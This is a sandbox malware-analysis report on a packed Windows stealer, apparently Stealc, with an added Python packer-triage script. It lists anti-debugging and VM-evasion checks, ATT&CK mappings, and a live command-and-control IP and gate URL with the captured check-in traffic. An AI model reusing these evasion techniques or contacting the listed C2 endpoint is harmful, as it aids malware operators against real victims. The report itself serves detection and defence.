                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D938B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00D938B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D94910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00D94910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D8DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_00D8DA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D8E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_00D8E430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D94570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00D94570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D8ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_00D8ED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D816D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00D816D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D8F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00D8F6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D93EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00D93EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D8BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_00D8BE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D8DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00D8DE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D81160 GetSystemInfo,ExitProcess,0_2_00D81160
                Source: file.exe, file.exe, 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.1796107974.0000000001867000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1796107974.0000000001886000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1796107974.0000000001852000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.1796107974.000000000180E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13703
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13722
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13706
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13718
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13758
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging

Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | File opened: NTICE
Source: C:\Users\user\Desktop\file.exe | File opened: SICE
Source: C:\Users\user\Desktop\file.exe | File opened: SIWVID
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D845C0 VirtualProtect ?,00000004,00000100,00000000 0_2_00D845C0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D99860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00D99860
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D99750 mov eax, dword ptr fs:[00000030h] 0_2_00D99750
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D978E0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA, 0_2_00D978E0
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exe | Memory protected: page guard

HIPS / PFW / Operating System Protection Evasion

Source: Yara match | File source: Process Memory Space: file.exe PID: 7628, type: MEMORYSTR
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D99600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, 0_2_00D99600
Source: file.exe, file.exe, 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: +~Program Manager
Source: C:\Users\user\Desktop\file.exe | Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree, 0_2_00D97B90
Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D97980 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA, 0_2_00D97980
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D97850 GetProcessHeap,RtlAllocateHeap,GetUserNameA, 0_2_00D97850
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D97A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA, 0_2_00D97A30

Stealing of Sensitive Information

Source: Yara match | File source: 0.2.file.exe.d80000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.1796107974.000000000180E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1754683786.00000000056C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 7628, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP

Remote Access Functionality

Source: Yara match | File source: 0.2.file.exe.d80000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.1796107974.000000000180E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1754683786.00000000056C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 7628, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP
MITRE ATT&CK matrix (one column per tactic; a number in front of a technique name is the count of matching signatures for this sample):

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 2 Command and Scripting Interpreter | 1 DLL Side-Loading | 11 Process Injection | 1 Masquerading | OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 2 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | 11 Native API | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 33 Virtualization/Sandbox Evasion | LSASS Memory | 641 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | 2 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 11 Disable or Modify Tools | Security Account Manager | 33 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 11 Process Injection | NTDS | 13 Process Discovery | Distributed Component Object Model | Input Capture | 12 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 1 Account Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 3 Obfuscated Files or Information | Cached Domain Credentials | 1 System Owner/User Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 12 Software Packing | DCSync | 1 File and Directory Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 DLL Side-Loading | Proc Filesystem | 324 System Information Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Antivirus detection for the submitted sample:

Source | Detection | Scanner | Label
file.exe | 100% | Avira | TR/Crypt.TPM.Gen
file.exe | 100% | Joe Sandbox ML |

No Antivirus matches (dropped files)
No Antivirus matches (unpacked PE files)
No Antivirus matches (domains)

Antivirus detection for URLs:

Source | Detection | Scanner | Label
http://185.215.113.37/ | 100% | URL Reputation | malware
http://185.215.113.37 | 100% | URL Reputation | malware
http://185.215.113.37/e2b1563c6670f193.php | 100% | URL Reputation | malware

No contacted domains info

Contacted URLs:

Name | Malicious | Antivirus Detection | Reputation
http://185.215.113.37/ | true | URL Reputation: malware | unknown
http://185.215.113.37/e2b1563c6670f193.php | true | URL Reputation: malware | unknown

URLs from memory and binaries:

Name | Source | Malicious | Antivirus Detection | Reputation
http://185.215.113.37/e2b1563c6670f193.phpzEV | file.exe, 00000000.00000002.1796107974.0000000001867000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37/sEO | file.exe, 00000000.00000002.1796107974.0000000001867000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37R4 | file.exe, 00000000.00000002.1796107974.000000000180E000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37 | file.exe, 00000000.00000002.1796107974.000000000180E000.00000004.00000020.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
http://185.215.113.37/e2b1563c6670f193.phpDEd | file.exe, 00000000.00000002.1796107974.0000000001867000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37/es | file.exe, 00000000.00000002.1796107974.0000000001867000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37/e2b1563c6670f193.phpI | file.exe, 00000000.00000002.1796107974.000000000180E000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37/e2b1563c6670f193.phpi | file.exe, 00000000.00000002.1796107974.0000000001852000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
Contacted IPs:

IP | Domain | Country | ASN | ASN Name | Malicious
185.215.113.37 | unknown | Portugal | 206894 | WHOLESALECONNECTIONSNL | true

General information:

Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1541560
Start date and time: 2024-10-25 00:18:14 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 3m 5s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 1
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: file.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@1/0@0/1
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 81%
• Number of executed functions: 20
• Number of non-executed functions: 87
Cookbook Comments:
• Found application associated with file extension: .exe
• Stop behavior analysis, all processes terminated
• Report size getting too big, too many NtQueryValueKey calls found.
• VT rate limit hit for: file.exe
                              No simulations
Context for the contacted IP (other analysed samples that contacted the same address):

Match | Associated Sample Name / URL | Detection | Threat Name | Context
185.215.113.37 | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 185.215.113.37/e2b1563c6670f193.php

No context (domains)

Context for the ASN (other analysed samples that contacted the same ASN):

Match | Associated Sample Name / URL | Detection | Threat Name | Context
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc, Vidar | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 185.215.113.16
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc, Vidar | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 185.215.113.16
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc, Vidar | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 185.215.113.16
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 185.215.113.16

No context (JA3 fingerprints)
No context (dropped files)
No created / dropped files found

Static file information:

File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.947757131124472
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: file.exe
File size: 1'826'816 bytes
MD5: 4af633ceed4aacaf057ea12772b50ad2
SHA1: 2fc5349b3cf3153eb303ec63dae8f9fa53f62909
SHA256: d88360912930f05dad8b9dabaee2ee7a32d568d39566d0b1ef487be6225edefc
SHA512: 65122eae07414f5b293280ac1c56903b4ddf9ed1d06ee9679ac6b4b56667202ff215822677ec1226676a509a51d08f74cfad978cbaa4fccae4462ae018b5f97b
SSDEEP: 24576:IcxpoiTsJIMzqLYeOS9/ogvJNEqRYD9/B5Nvj2gLRzJKTDrA1rtaqYR5SArD0ZuI:L3NoDq39/XXRR6vzLMfaaTgAksC5D2
TLSH: D08533AA2E27F6EEF6C34C72378D54722CA602601DE6BBF2AD40587453477B83D05B16
                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........
Icon Hash: 90cececece8e8eb0
Entrypoint: 0xa8d000
Entrypoint Section: .taggant
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp: 0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 1
File Version Major: 5
File Version Minor: 1
Subsystem Version Major: 5
Subsystem Version Minor: 1
Import Hash: 2eabe9054cad5152567f0699947a2c5b
                              Instruction
                              jmp 00007F5E9481172Ah
                              Programming Language:
                              • [C++] VS2010 build 30319
                              • [ASM] VS2010 build 30319
                              • [ C ] VS2010 build 30319
                              • [ C ] VS2008 SP1 build 30729
                              • [IMP] VS2008 SP1 build 30729
                              • [LNK] VS2010 build 30319
                              Name                                  Virtual Address  Virtual Size  Is in Section
                              IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
                              IMAGE_DIRECTORY_ENTRY_IMPORT          0x25d050         0x64          .idata
                              IMAGE_DIRECTORY_ENTRY_RESOURCE        0x0              0x0
                              IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
                              IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
                              IMAGE_DIRECTORY_ENTRY_BASERELOC       0x25d1f8         0x8           .idata
                              IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
                              IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
                              IMAGE_DIRECTORY_ENTRY_IAT             0x0              0x0
                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
                              IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
                              Only the import directory (0x64 bytes) and the base-relocation directory (0x8 bytes) are populated, both inside the 0x200-byte .idata section. There is no IAT, TLS, load-config, debug, security or resource directory, which is consistent with a packer stub rather than with the original build of the program.
                              Name       Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity      File Type             Entropy             Characteristics
                              (unnamed)  0x1000           0x25b000      0x22800   7825c519f27d13cc7059e9db1cbdbd8e  unknown   unknown              unknown               unknown             RWX
                              .rsrc      0x25c000         0x1000        0x0       d41d8cd98f00b204e9800998ecf8427e  False     0                    empty                 0.0                 RW
                              .idata     0x25d000         0x1000        0x200     c60c4959cc8d384ac402730cc6842bb0  False     0.1328125            data                  0.9064079259880791  RW
                              (unnamed)  0x25e000         0x296000      0x200     c326fff1ac31310b590fea84f0f546fc  unknown   unknown              unknown               unknown             RWX
                              igioonnz   0x4f4000         0x198000      0x197e00  521231db8d407702c766f2c5f931c7a6  False     0.9951144939472878   data                  7.9541328107459774  RWX
                              dimpkies   0x68c000         0x1000        0x400     4f5067476cd62a80af34cb3fbe7354ea  False     0.8583984375         data                  6.512164561394596   RWX
                              .taggant   0x68d000         0x3000        0x2200    0a50a632c047f5e4691cb8f1481eb504  False     0.06721047794117647  DOS executable (COM)  0.7347270425044776  RWX
                              Characteristics: RWX = IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE; RW = IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE.
                              Reading the table: two of the seven sections have empty names and two have random eight-letter names (igioonnz, dimpkies), which is what the "PE file contains section with special chars" signature reports. Every executable section is also writable. The two unnamed sections reserve 0x25b000 and 0x296000 bytes of virtual memory against only 0x22800 and 0x200 bytes on disk, i.e. they are the regions the stub unpacks into at run time (compare "Detected unpacking (changes PE section rights)"), and igioonnz is 1.6 MB of near-maximal-entropy data (7.95 bits/byte), the compressed or encrypted payload. The raw sizes sum to 0x1bd000 (1,822,720 bytes); with 0x1000 bytes of headers this matches the 1,826,816-byte file exactly, so nothing is appended as an overlay. .taggant is a section name produced by packers that implement the IEEE Taggant System; the "DOS executable (COM)" file type for it is a libmagic guess on a small binary blob and carries no meaning.
                              DLL           Import
                              kernel32.dll  lstrcpy
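The section table above and the single static import (kernel32!lstrcpy, everything else being resolved at run time) are the shape a practitioner checks for before spending time on the stub. The following Python is an added example written for this page, not Joe Sandbox or Stealc code: it rebuilds the IMAGE_SECTION_HEADER records from the numbers in the report with struct, parses them back the way a PE parser would, and applies the usual packer heuristics. The entropy values are the report's own measurements rounded to three places (None where the report says "unknown"); PointerToRawData is not in the report and is set to 0; the 4x virtual-to-raw ratio and the 7.0 bits/byte entropy cut-off are assumed triage thresholds.

```python
"""Packer triage over the section table of file.exe as listed in this report.
Added example, not Joe Sandbox code: IMAGE_SECTION_HEADER records are rebuilt
from the report's numbers, parsed back with struct, and scored."""
import struct

IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000
RWX = IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE
RW = IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE

# IMAGE_SECTION_HEADER (40 bytes): Name[8], VirtualSize, VirtualAddress,
# SizeOfRawData, PointerToRawData, PointerToRelocations, PointerToLinenumbers,
# NumberOfRelocations, NumberOfLinenumbers, Characteristics
SECTION_HEADER = struct.Struct("<8sIIIIIIHHI")

# (name, VirtualAddress, VirtualSize, SizeOfRawData, Characteristics, entropy)
# Values are the report's. Entropy is the report's measurement rounded to three
# places, None where the report says "unknown". PointerToRawData is not in the
# report and is left at 0 (assumption; the heuristics never read it).
REPORT_SECTIONS = [
    ("",         0x001000, 0x25b000, 0x022800, RWX, None),
    (".rsrc",    0x25c000, 0x001000, 0x000000, RW,  0.0),
    (".idata",   0x25d000, 0x001000, 0x000200, RW,  0.906),
    ("",         0x25e000, 0x296000, 0x000200, RWX, None),
    ("igioonnz", 0x4f4000, 0x198000, 0x197e00, RWX, 7.954),
    ("dimpkies", 0x68c000, 0x001000, 0x000400, RWX, 6.512),
    (".taggant", 0x68d000, 0x003000, 0x002200, RWX, 0.735),
]

STANDARD_NAMES = {".text", ".rdata", ".data", ".rsrc", ".reloc", ".idata",
                  ".edata", ".pdata", ".tls", ".bss", ".CRT"}
VSIZE_RATIO = 4      # assumed cut-off: reserves > 4x its on-disk size
HIGH_ENTROPY = 7.0   # assumed cut-off: bits/byte of the on-disk bytes


def build_section_table(rows):
    """Serialize rows as a raw PE section table (the bytes after the optional header)."""
    return b"".join(
        SECTION_HEADER.pack(name.encode("ascii").ljust(8, b"\0"),
                            vsize, va, raw, 0, 0, 0, 0, 0, chars)
        for name, va, vsize, raw, chars, _ in rows)


def parse_section_table(blob, count):
    """Parse `count` IMAGE_SECTION_HEADER records from `blob`."""
    sections = []
    for i in range(count):
        name, vsize, va, raw, *_rest, chars = SECTION_HEADER.unpack_from(
            blob, i * SECTION_HEADER.size)
        sections.append({"name": name.rstrip(b"\0").decode("latin-1"),
                         "vaddr": va, "vsize": vsize, "rawsize": raw, "chars": chars})
    return sections


def triage(rows):
    """Round-trip the rows through the binary format, then flag each section."""
    sections = parse_section_table(build_section_table(rows), len(rows))
    results = []
    for sec, row in zip(sections, rows):
        entropy = row[5]
        flags = []
        c = sec["chars"]
        if c & IMAGE_SCN_MEM_EXECUTE and c & IMAGE_SCN_MEM_WRITE:
            flags.append("rwx")                 # code that may rewrite itself
        if sec["rawsize"] and sec["vsize"] > VSIZE_RATIO * sec["rawsize"]:
            flags.append("vsize>>rawsize")      # memory reserved for an unpacked image
        if sec["name"] not in STANDARD_NAMES:
            flags.append("nonstandard-name")    # empty or randomized section name
        if entropy is not None and entropy >= HIGH_ENTROPY:
            flags.append("high-entropy")        # compressed/encrypted payload on disk
        results.append({**sec, "entropy": entropy, "flags": flags})
    return results


def is_probably_packed(results):
    """True if some writable+executable section carries or unpacks a payload."""
    return any("rwx" in r["flags"]
               and ({"high-entropy", "vsize>>rawsize"} & set(r["flags"]))
               for r in results)


if __name__ == "__main__":
    rows = triage(REPORT_SECTIONS)
    for r in rows:
        print(f"{r['name'] or '(unnamed)':<10} va=0x{r['vaddr']:06x} "
              f"vsize=0x{r['vsize']:06x} raw=0x{r['rawsize']:06x} "
              f"{', '.join(r['flags']) or '-'}")
    print("probably packed:", is_probably_packed(rows))
```

The ratio test alone is noisy: .idata (0x1000 virtual, 0x200 raw) trips it purely because virtual size is page-aligned and raw size is file-aligned, which is why the verdict requires a writable+executable section in addition to either the ratio or the entropy signal. On this sample five of seven sections are RWX and both unnamed sections pass the ratio test, so the verdict is True.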
                              Timestamp                        SID      Signature                                        Severity  Source IP    Source Port  Dest IP         Dest Port  Protocol
                              2024-10-25T00:19:17.598711+0200  2044243  ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in  1         192.168.2.4  49730        185.215.113.37  80         TCP
                              Timestamp                             Source Port  Dest Port  Source IP       Dest IP         Note (from the HTTP conversation below)
                              Oct 25, 2024 00:19:16.331762075 CEST  49730        80         192.168.2.4     185.215.113.37
                              Oct 25, 2024 00:19:16.339684963 CEST  80           49730      185.215.113.37  192.168.2.4
                              Oct 25, 2024 00:19:16.339824915 CEST  49730        80         192.168.2.4     185.215.113.37
                              Oct 25, 2024 00:19:16.339945078 CEST  49730        80         192.168.2.4     185.215.113.37  GET / (reachability probe)
                              Oct 25, 2024 00:19:16.347491980 CEST  80           49730      185.215.113.37  192.168.2.4
                              Oct 25, 2024 00:19:17.298089981 CEST  80           49730      185.215.113.37  192.168.2.4     200 OK, empty body
                              Oct 25, 2024 00:19:17.298217058 CEST  49730        80         192.168.2.4     185.215.113.37
                              Oct 25, 2024 00:19:17.300923109 CEST  49730        80         192.168.2.4     185.215.113.37  POST /e2b1563c6670f193.php (hwid + build check-in)
                              Oct 25, 2024 00:19:17.309983969 CEST  80           49730      185.215.113.37  192.168.2.4
                              Oct 25, 2024 00:19:17.598597050 CEST  80           49730      185.215.113.37  192.168.2.4     200 OK, body YmxvY2s= (base64 "block")
                              Oct 25, 2024 00:19:17.598711014 CEST  49730        80         192.168.2.4     185.215.113.37  Suricata SID 2044243 raised at this timestamp
                              Oct 25, 2024 00:19:19.889525890 CEST  49730        80         192.168.2.4     185.215.113.37
